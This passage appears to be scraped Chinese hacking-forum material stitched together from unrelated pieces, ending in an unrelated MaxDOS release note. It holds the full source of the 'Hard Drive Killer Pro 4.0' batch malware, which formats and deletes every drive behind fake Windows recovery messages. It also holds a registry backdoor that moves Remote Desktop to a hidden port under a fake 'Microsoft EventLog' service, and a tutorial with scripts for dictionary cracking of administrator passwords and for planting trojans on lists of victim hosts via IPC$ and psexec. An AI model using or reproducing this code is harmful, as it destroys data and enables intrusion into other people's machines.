>>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Description"="Keep record of the program and windows' message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] 3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo call format c: /q /u /autoSample >nul >>c:autoexec.bat call attrib +r +h c:autoexec.bat >nul rem Drive checking and assigning the valid drives to the drive variable. set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, don't worry about how it rem works, it's d*amn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem When errorlevel is 1, then the above is not true, if 0, then it's true. rem Opposite of binary rules. If 0, it will elaps to the next command. echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. rem if errorlevel is 0, then it will elaps to the next command. echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if it's errorlevel 1, then the specified drive is a hard or floppy drive. rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive. echo :enddc >>drivechk.bat rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". rem Now we will use the program drivechk.bat to attain valid drive information. :Sampledrv for %%a in (%alldrive%) do call drivechk.bat %%a >nul del drivechk.bat >nul if %drive.==. set drive=c :form_del call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cd >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:autoexec.bat echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:autoexec.bat echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Regards, >>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Munga Bunga >>c:autoexec.bat call attrib +r +h c:autoexec.bat :makedir if exist c:temp.bat attrib -r -h c:temp.bat >nul echo @echo off >c:temp.bat echo %%1: >>c:temp.bat echo cd >>c:temp.bat echo :startmd >>c:temp.bat echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat call attrib +r +h c:temp.bat >nul cls echo Initializing Variables . . . rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction. for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul cls echo Initializing Variables . . . echo Validating Data . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . for %%a in (%drive%) call attrib -r -h %%a: /S >nul call attrib +r +h c:temp.bat >nul call attrib +r +h c:autoexec.bat >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . for %%a in (%drive%) call deltree /y %%a:*. >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . echo Starting Application . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Thank you for using a Munga Bunga product. echo. echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. echo. echo Here is a joke for you . . . echo. echo Q). What's the worst thing about being an egg? echo A). You only get laid once. echo. echo HAHAHAHA, get it? Don't you just love that one? echo. echo Regards, echo. echo Munga Bunga :end rem Hard Drive Killer Pro Version 4.0, enjoy!!!! rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here) 全文完毕, 简明批处理教程(上)2009-05-30 15:53 前言 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片<>给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串"  待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名  待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字  待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2   DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [[drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 z 或 Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \\%1 c:\winnt\system32\windrv32.exe @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. No.2 二.如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3 三.如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:\>dir z: & dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:51 . 2002-05-14 23:51 .. 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:\>dir z: && dir c:\Ex4rch The system cannot find the path specified. C:\>dir c:\Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:55 . 2002-05-14 23:55 .. 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:\Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:\Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
MaxDOS 5.6s U盘版
很好用的U盘系统盘制作工具这次出的所谓MaxDOS 密码读取工具,其实只是读取了安装日志LOG里的设置值,并不是真正的MD5值被编译,本来不想保留这个东西的,但是如果不保留这个LOG文件的话,又无法完成自动卸载,怕有些人又说是什么恶意软件,卸载都不能,你出了个密码读取器对我来说没什么损失,但是你害的人可能更多,你也辛苦跟踪了这个安装文件这么久...如果密码不想被读取很简单,就是直接删除 x:\windows\system32\sys56s.ini (2000为winnt) 这个文件,或者将其改名成其它文件名,他就读不出来了,但是如果删除了这个文件就会造成无法自动卸载 MAXDOS程序,当然你也可以备份一份起来再删除...如果不懂的删的话,直接下载附件中的程序运行一下就会自动删除.这个问题我会在近期解决.对此造成的问题我也有错,对不起... MaxDOS 5.6S 说明文件 如果您有何问题,请在此跟贴,或者到我论坛中发问。谢谢。 1.加入了10多种新型网卡驱动,以及更新以前一些驱动存在的问题. 2.支持DOS下直接访问局域网的共享资源,可以读写共享目录,当然要共享目录要开启写权限. 当然您还可以使用此功能来实现网刻,在GHOST直接调用共享目录里的.GHO文件. 3.新型的网刻模式,让菜鸟也懂的网刻.全操作中文界面,只需一键即可完成网刻. 4.支持引导自已制作的标准1.44M/2.88M IMG镜像,请将镜像更名为MaxDiy.IMG存放到C:\的 根目录下(即C:\MaxDiy.IMG)就可以正常引导.且可以在安装时设置密码. 5.加入一键恢复/备份,可直接在菜单中选择备份或还原镜像.支持镜像存放在 D/E/F/G分区. 6.新的NTFS分区读写程序,更稳定,且支持LINUX的ext2/ext3和隐藏分区读写,支持长文件名. 7.加入HDDREG 1.51版,MHDD 4.6版,以及SPFDISK中文版. 8.更新GHOST为 8.3版,不过这里要说一下喜欢玩新的朋友,GHOST 8.2版不支持 GHOST 8.3 版制作的镜像.也就是说如果您用 8.3做好母盘的镜像,以前MAXDOS 5.5S客户端的将不能 识别8.3制作的镜像。如果要使用 8.3版GHOST,请记住母盘的镜像一样要使用GHOST 8.2 来制作.您可以将 GHOST 8.2存放在硬盘中调用. 9.修正上个版本的一些小问题,以及汉化一些程序. 10.加入对USBCD的支持. 同时在我们的网站上也即将提供了MAXDOS 5.6s的光盘版,PXE镜像版,U盘版,以及一些插件.如 果您需要这些,请访问我们的网站 Http://Www.Pzz.Cn 或者 Http://Www.MaxDOS.Net 11.加入了新网卡驱动如下: nForce 1/2/3/4 系列 ULi PCI Fast Ethernet Controller ULi Electronics Inc. Realtek RTL8136/810x Family Fast Ethernet NIC Realtek RTL8168/8111 PCI-E Gigabit Ethernet NIC D-Link DFE-550TX FAST Ethernet 10/100 Adapter Sundance ST201 based Adapter NT Driver D-link DGE-530TX FAST Ethernet 10/100 Adapter Tenda 8139D VIA Networking Velocity-Family Gb Ethernet Adapter INTEL PRO 1000 的新系列10多种. INTEL PRO 100 的新系列6种. RADTEK RTK8189C Based Fast Ethernet Card Marvell Yukon PCI 添加了10多种型号. 以及修正 VIA Rhine 系列网卡存在的问题。 更新了一些旧版本中驱动中存在的问题,所有驱动更新为最新版本的DOS驱动. Nforce 4系列可能有个别主板不兼容,问过官方得到的答案是由于主板厂商为节省材料使 用了软芯片造成,这一般发生在杂牌主板上. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& MaxDOS 5.6s 安装启动后有如下七个选项: 选项A. MaxDOS工具集+Packet网卡驱动网刻 解: MaxDos 的所有工具,包括PACKET的DOS驱动都在些选项.进入后全中文界面,以及全自动 加载网卡驱动.可以选择全盘或单分区刻隆.就不再多加解释了,进入后都懂. PACKET网卡共支持以下几种网卡: 3C905PKT.com 3Com EtherLink PCI Bus Master Packet Driver (3COM 905) 3C90XPD.COM 3Com Fast EtherLink XL 10/100Mb TX Ethernet NIC (3C90X) E310.COM Adico AE310-TX PCI 10/100 Fast Ethernet Adapter AMDPCNET.com AMD PCnet Family DCN530tx.COM DCN-530TX PCI Ethernet Adapter V1.00 (2002.0411) DFE530TX.COM D-Link DLE-530TX PCI NIC (Rev B) V2.53 (2000.0525) DLE530TX.COM D-Link DFE-530TX PCI NIC V4.10 (2002.0703) IP100PD.COM IC Plus IP100 based Fast Ether Adapter V3.03 (2003.0411) PRO100.COM Intel EtherExpress(tm) PRO/10 & PRO/100B PCI,(已更新,可用) RTL8029.COM Realtek RTL8029(AS) PCI Ethernet NIC 1998 RTL8139.COM Realtek RTL8139 Family PCI Fast Ethernet NIC v3.40 SIS900.EXE SiS 900/7016 PCI Fast Ethernet Adapter V1.15 (2002.0816) VIA.COM VIA Rhine I/II Family Fast Ether Adapter V4.16 (已更新,可用) NV.EXE GHOST自带的万能PACKET驱动,如果您有的网卡不能驱动,请尝试此驱动 有人提过此驱动,可驱动NF系列的网卡,如果选项3不成功,可尝试此驱动,见下面的命令行. 5.6S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍,以下为旧版模式. 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 关于旧版本的网刻模式,依然是存在的.5.5S或更早旧版本里命令行模式PKT驱动网刻说 明:先将要做为网刻服务端的IP地址改为:192.168.5.100 子奄码为:255.255.255.0 其它网关和DNS的可以都去掉,也可随意保留.然后打开GHOSTSRV服务端,把GHOSTSRV里面的 会话名称改为:max (如果您没有GHOSTSRV,请到我们的网站中下载 Http://Bbs.Pzz.Cn) 一定要是max,否则客户机会连不上, 为什么要用192.168.5.100的IP呢,因为有人说如果 IP网段跟内网机器使用的网段不同的话,可以加快网刻速度,所以故意将服务器IP指为, 192.168.5.100 以隔开别的网段!当然没有实际证明. 5.5S或更早的版本客户机上设置如下,例 VIA 网卡用户请使用格式: VIAGO 45 (VIAGO为自动批处理文件,45为您要设置的客户机IP的最后一位数,前面的192.168.5不用 输入的,输入为自后自动激活网卡,及IP奄码配置文件,自动生成IP地址为 192.168.5.45 子奄码为:255.255.255.0 网关:192.168.5.100),详细请见下表各网卡的批处理. 以下为5.5S版本或更旧的版本,全盘网刻例子: NV 网卡,自动网刻命令格式如后----> NVGO X (X为客户机IP,不准从复) 3C90X 网卡,自动网刻命令格式如后----> 3C90XGO X (X为客户机IP,不准从复) DCN530TX 网卡,自动网刻命令格式如后----> DCN530GO X (X为客户机IP,不准从复) DFE530TX 网卡,自动网刻命令格式如后----> DFE530GO X (X为客户机IP,不准从复) DLE530TX 网卡,自动网刻命令格式如后----> DLE530GO x (X为客户机IP,不准从复) IP 100 网卡,自动网刻命令格式如后----> IP100GO X (X为客户机IP,不准从复) PRO100 网卡,自动网刻命令格式如后----> PRO100GO x (X为客户机IP,不准从复) RTL8029 网卡,自动网刻命令格式如后----> 8029GO X (X为客户机IP,不准从复) RTL8139 网卡,自动网刻命令格式如后----> 8139GO X (X为客户机IP,不准从复) SIS900 网卡,自动网刻命令格式如后----> SIS900GO X (X为客户机IP,不准从复) VIA 网卡,自动网刻命令格式如后----> VIAGO X (X为客户机IP,不准从复) 以下为5.5S版本或更旧的版本,单盘网刻例子: NV 网卡,单分区网刻命令格式如后----> NVGX X (X为客户机IP,不准从复) 3C90X 网卡,单分区网刻命令格式如后----> 3C90XGX X (X为客户机IP,不准从复) DCN530TX 网卡,单分区网刻命令格式如后----> DCN530GX X 